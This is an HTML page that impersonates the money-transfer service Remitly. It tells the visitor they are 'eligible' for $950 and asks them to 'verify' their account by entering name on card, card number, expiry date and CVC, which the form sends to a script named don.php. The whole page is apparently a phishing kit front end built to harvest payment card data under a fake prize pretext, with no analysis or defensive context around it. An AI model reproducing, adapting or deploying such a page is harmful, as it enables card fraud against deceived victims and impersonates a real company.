<!DOCTYPE html>
<html lang="ptm">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Remitly</title>
  <style>
#ptm_logo
{
  width: 102%;
  margin-top: 0px;
  
}

.crdnam{
  -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: rgba(0,0,0,0);
    font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
    color: #19293a;
    -webkit-box-align: stretch;
    -webkit-box-direction: normal;
    -webkit-box-orient: vertical;
    align-items: stretch;
    border: 1px solid black;
    box-sizing: border-box;
    display: flex;
    flex-basis: auto;
    flex-direction: column;
    flex-shrink: 0;
    margin-top: 40px;
    margin-left: 30PX;
    height: 40px;
    width: 300px;
    padding: 20px;
    position: relative;
    z-index: 0;
    border-color: rgb(25, 41, 58);
    font-size: 20px;
    line-height: 28px;
}
.crdnum{
  -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: rgba(0,0,0,0);
    font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
    color: #19293a;
    -webkit-box-align: stretch;
    -webkit-box-direction: normal;
    -webkit-box-orient: vertical;
    align-items: stretch;
    border: 1px solid black;
    box-sizing: border-box;
    display: flex;
    flex-basis: auto;
    flex-direction: column;
    flex-shrink: 0;
    margin-top: 15px;
    margin-left: 30PX;
    height: 20px;
    width: 300px;
    padding: 20px;
    position: relative;
    z-index: 0;
    border-color: rgb(25, 41, 58);
    font-size: 20px;
    line-height: 28px;
}
.expr{
  -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: rgba(0,0,0,0);
    font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
    color: #19293a;
    -webkit-box-align: stretch;
    -webkit-box-direction: normal;
    -webkit-box-orient: vertical;
    align-items: stretch;
    border: 1px solid black;
    box-sizing: border-box;
    display: flex;
    flex-basis: auto;
    flex-direction: column;
    flex-shrink: 0;
    margin-top: 20px;
    margin-left: 30PX;
    height: 40px;
    width: 130px;
    padding: 20px;
    position: relative;
    z-index: 0;
    border-color: rgb(25, 41, 58);
    font-size: 20px;
    line-height: 28px;
}
.cvv{
  -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: rgba(0,0,0,0);
    font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
    color: #19293a;
    -webkit-box-align: stretch;
    -webkit-box-direction: normal;
    -webkit-box-orient: vertical;
    align-items: stretch;
    border: 1px solid black;
    box-sizing: border-box;
    display: flex;
    flex-basis: auto;
    flex-direction: column;
    flex-shrink: 0;
    margin-top: -40px;
    margin-right: 45px;
    height: 40px;
    width: 130px;
    float: right;
    padding: 20px;
    position: relative;
    z-index: 0;
    border-color: rgb(25, 41, 58);
    font-size: 20px;
    line-height: 28px;
}
.checkout-btn {
  width: 55%;
  height: 45px;
  margin-top: 30px;
  position: relative;
  left: 20%;
  padding: 0;
  font-weight: bold;
  color: rgb(13, 13, 14);
  text-align: center;
  text-shadow: 0 -1px 1px rgba(0, 0, 0, 0.2);
  border: 1px solid;
  border-color: #97a7b8 #97a7b8 #97a7b8;
  background: #1993fb;
  border-radius: 4px;
  background-image: -webkit-linear-gradient(top, #42c888, #42c888 40%, #42c888);
  background-image: -moz-linear-gradient(top, #42c888, #42c888 40%, #42c888);
  background-image: -o-linear-gradient(top, #42c888, #42c888 40%, #42c888);
  background-image: linear-gradient(to bottom, #42c888, #42c888 40%, #42c888);
  -webkit-box-shadow: inset 0 1px rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.2);
  box-shadow: inset 0 1px rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.2);
}
.prgf {
  line-height: 10px;
  font-size: 20px;
  margin-top: 80px;
  color: #39ed21;
  text-align: center;
}

.txts {
  line-height: 20px;
  font-size: 20px;
  margin-top: 35px;
  text-align: center;
}
.txt {
  line-height: 25px;
  font-size: 20px;
  margin-top: 15px;
  text-align: center;
}

</style>
</head>
<body>
<img src="remitly.png" alt="" id="ptm_logo">
<div class="prgf">
<h2> Congratulations</h2>
</div>
<div class="txts">
<p>you are eligible <b>$950</b></p></div>
<div class="txt">
    <p>verify your account information to</br> Receive Payment in your Bank</p></div>
  <form class="checkout" action="don.php" method="post">
    <input class="crdnam" type="text" name="name_on_card" placeholder=" Name on card" maxlength="50" required>
    <input class="crdnum" type="tel" name="card_number" placeholder=" Card number" maxlength="16" required>
    <input class="expr" type="tel" name="ex_date" placeholder="MM/YY" maxlength="7" required>
    <input class="cvv" type="tel" name="cvv" placeholder="  CVC" maxlength="3" required>
    <input type="submit" value="PROCEED" class="checkout-btn">
</form>
  </body>
</html>

